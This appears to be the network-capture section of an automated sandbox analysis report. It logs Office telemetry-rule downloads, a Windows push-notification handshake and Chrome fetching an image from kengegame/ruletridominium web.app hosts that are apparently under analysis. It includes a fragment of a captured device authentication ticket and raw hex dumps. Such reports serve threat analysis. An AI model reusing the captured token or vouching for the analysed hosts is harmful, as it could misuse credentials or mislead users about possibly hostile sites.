                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:55 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 469
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                x-ms-request-id: e72ec3ca-501e-005b-2401-17d7f7000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144155Z-1657d5bbd48dfrdj7px744zp8s00000001w0000000009nd3
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                33192.168.2.64976013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:55 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                x-ms-request-id: 27ba9a72-001e-0046-2a01-17da4b000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144155Z-1657d5bbd48xdq5dkwwugdpzr000000002c000000000h036
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                34192.168.2.64976113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:56 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 464
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                x-ms-request-id: 5a59384b-a01e-0053-3602-178603000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144156Z-1657d5bbd487nf59mzf5b3gk8n00000001t0000000007qap
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                35192.168.2.64976213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:56 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 494
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                x-ms-request-id: d3d0b776-b01e-003d-1803-17d32c000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144156Z-1657d5bbd48xdq5dkwwugdpzr000000002b000000000n18y
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                36192.168.2.64976313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:56 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                x-ms-request-id: c2d0a885-201e-0003-7ced-16f85a000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144156Z-1657d5bbd48xdq5dkwwugdpzr000000002b000000000n18z
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                37192.168.2.64975840.113.103.199443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 61 30 4a 43 57 58 4a 41 32 45 71 4e 5a 41 41 57 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 64 64 30 32 64 35 31 37 61 62 39 32 35 36 38 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: a0JCWXJA2EqNZAAW.1Context: 8dd02d517ab92568
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 61 30 4a 43 57 58 4a 41 32 45 71 4e 5a 41 41 57 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 64 64 30 32 64 35 31 37 61 62 39 32 35 36 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 66 6f 77 71 54 65 43 64 79 53 79 76 77 2b 46 39 52 67 2b 5a 42 61 67 36 54 51 4c 49 56 2b 6a 7a 6c 4a 38 41 53 59 35 44 53 51 34 35 4b 70 55 6c 47 43 54 62 66 57 38 71 66 58 6c 33 6f 77 47 63 72 69 34 41 32 66 46 5a 74 53 32 34 36 73 39 51 41 36 6e 46 48 6b 49 46 65 71 42 32 6b 44 34 57 4d 68 78 76 50 75 59 76 51 2b 45 63
                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: a0JCWXJA2EqNZAAW.2Context: 8dd02d517ab92568<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAafowqTeCdySyvw+F9Rg+ZBag6TQLIV+jzlJ8ASY5DSQ45KpUlGCTbfW8qfXl3owGcri4A2fFZtS246s9QA6nFHkIFeqB2kD4WMhxvPuYvQ+Ec
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 61 30 4a 43 57 58 4a 41 32 45 71 4e 5a 41 41 57 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 64 64 30 32 64 35 31 37 61 62 39 32 35 36 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\WNS 0 197MS-CV: a0JCWXJA2EqNZAAW.3Context: 8dd02d517ab92568<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC58INData Raw: 4d 53 2d 43 56 3a 20 57 61 44 39 71 51 46 73 41 45 47 57 46 33 4f 33 33 75 46 33 5a 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: WaD9qQFsAEGWF3O33uF3ZA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                38192.168.2.649768199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC620OUTGET /c38b46548211dc0a01b864de5360ff89.jpg HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                Referer: https://kengegame.web.app/
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC593INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 68087
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                Etag: "470947f9129dff27c0598db82dba5db6d82dcc647d53eaeeb2e1b66a9663eec1"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:56 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-nyc-kteb1890048-NYC
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225717.624190,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 46 00 00 ff e1 03 31 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: JFIFExifII*DuckyF1http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1378INData Raw: 82 80 89 14 19 54 96 54 19 d5 02 ca a0 9e 8c 76 f4 42 53 18 f0 f4 2e 2b 1b 4b a5 28 59 63 51 2f 9f 09 9e 52 d4 6a ed 01 14 b2 c6 77 e9 6b 86 03 3f 0b a5 d4 23 8f 4c 40 a0 b0 53 9e 98 59 51 45 95 98 7d f7 95 53 5c 53 66 97 85 9d 37 11 19 b3 04 80 12 12 1d 2e 96 0a fb 47 9b 88 bb b5 57 0c df d4 cd c3 8e de dc de 78 ea f5 b3 79 d8 f4 5b f8 5c 98 db e9 7c ff 00 6b 44 55 5a a7 2b a2 b9 6b 96 ea 69 84 52 58 a6 ba b0 e6 ba 87 aa fa e1 aa 9b 25 a5 c9 d2 c3 f4 6c 79 0e 27 50 d1 19 b9 ab 08 b1 24 29 14 66 40 51 62 05 0b 37 df 99 2b 77 ab 45 f6 14 3d b2 0a 73 d6 40 02 42 64 d7 dc 95 d1 9b 16 14 ea f4 78 f6 e6 e8 df c9 bc c7 ad b1 5b 1b 79 7a aa 8b f0 66 8d 79 f6 75 36 14 a0 98 ad 7c 99 2c 7e 96 d2 05 80 cd 9a ab 6a cb 44 d5 72 d4 c8 58 33 ab db 36 e9 9b f6 5a c1 e3
                                                                                                                                                                                                                                                                                Data Ascii: TTvBS.+K(YcQ/Rjwk?#L@SYQE}S\Sf7.GWxy[\|kDUZ+kiRX%ly'P$)f@Qb7+wE=s@Bdx[yzfyu6|,~jDrX36Z
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1378INData Raw: 68 00 ae 84 24 35 dd 92 7b 9b 2a e2 e4 e8 df cd c7 e9 2f 7a b4 52 96 e9 af 45 f5 9c f3 51 60 4a e6 9a 86 a6 46 a7 95 34 3f 42 eb ea 53 36 1c 6a fe 95 e9 a6 8a b5 ea be 4a d2 95 ba c6 b5 ef af 91 9f b5 c0 c3 ec ac af 3d f4 e5 19 4c 99 6e be 85 90 24 89 a7 44 94 e5 4d 5d 6c 18 b2 da 88 4d dd de 9c 8f 24 11 42 d1 66 f7 e6 72 a8 55 ae 85 00 9b 44 dd e8 f1 f2 2f 93 99 41 e8 af cc 5e b9 73 5d d2 ea 45 57 02 14 e6 79 bd e8 aa 26 a1 a5 31 71 e9 35 f4 74 e8 ad 4e 3d 15 9e 97 2a 8e 33 db 7d a9 5d 39 31 5d ab 7e a7 39 8f 3c be 67 b2 6c fc 3e 8c bf 3c 40 b6 c8 cf 04 c8 40 54 ee b9 12 ef 52 b8 38 79 2a 59 26 4e b5 dd 0e 94 cc 54 a5 55 6c d4 86 6e 67 36 9a ba 13 ce 50 66 86 eb ef e2 e2 b7 2b ba 27 63 77 37 46 9c 79 28 7b fa 1d 7b 88 32 70 86 97 cb db b2 b4 68 47 17 26
                                                                                                                                                                                                                                                                                Data Ascii: h$5{*/zREQ`JF4?BS6jJ=Ln$DM]lM$BfrUD/A^s]EWy&1q5tN=*3}]91]~9<gl><@@TR8y*Y&NTUlng6Pf+'cw7Fy({{2phG&
